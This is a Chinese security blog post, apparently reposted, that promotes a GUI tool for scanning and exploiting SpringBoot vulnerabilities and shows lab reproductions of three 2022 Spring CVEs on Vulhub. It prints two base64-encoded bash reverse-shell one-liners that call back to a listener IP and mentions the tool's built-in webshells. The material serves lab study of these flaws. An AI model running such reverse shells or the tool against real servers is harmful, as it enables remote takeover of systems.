一款图形化SpringBoot漏洞检测利用工具
2023-5-28 19:2:20 Author: 猪猪谈安全(查看原文) 阅读量:37 收藏

项目地址

https://github.com/13exp/SpringBoot-Scan-GUI

开源工具 SpringBoot-Scan 的GUI图形化版本,对你有用的话麻烦点个Star哈哈~

注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!

Windows使用

python3 SpringBoot-Scan-GUI.py

也可以直接下载执行release打包好的exe程序

Linux使用

python3 SpringBoot-Scan-GUI-Linux.py

或者使用 wine 来执行:

sudo wine SpringBoot-Scan-GUI.exe

VulHub 漏洞测试环境搭建

git clone https://github.com/vulhub/vulhub.git

安装Docker环境

sudo apt-get install docker.io
sudo apt install docker-compose

搭建CVE-2022-22965

cd /vulhub/CVE-2022-22965
sudo docker-compose up -d

搭建CVE-2022-22963

cd /vulhub/CVE-2022-22963
sudo docker-compose up -d

搭建CVE-2022-22947

cd /vulhub/CVE-2022-22947
sudo docker-compose up -d

如果报错,自行修改 .yml 文件中映射的端口号

漏洞复现演示

一、CVE-2022-22965

VulHub 环境复现

  

内置shell 

aabysszg-shell 

13exp-shell

春秋云境 环境复现

内置shell 

13exp-shell 

aabysszg-shell  

二、CVE-2022-22963

VulHub 环境复现

准备反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1

Kali监听对应端口: 

漏洞利用  

春秋云境 环境复现

注:云境反弹shell需使用公网服务器

服务器监听 

 

三、CVE-2022-22947

VulHub 环境复现

同样准备反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1

kali监听对应端口: 

漏洞利用  

春秋云境 环境复现

 

 点击下方小卡片或扫描下方二维码观看更多技术文章

师傅们点赞、转发、在看就是最大的支持


文章来源: http://mp.weixin.qq.com/s?__biz=MzIyMDAwMjkzNg==&mid=2247511084&idx=1&sn=587e83c6d5941a33a7bc403aeeea3585&chksm=97d0433ba0a7ca2de94ed69cbaef1ed54db1f3f5d299736aa10e0af0c3bfcc0d79798e61b29d#rd
如有侵权请联系:admin#unsafe.sh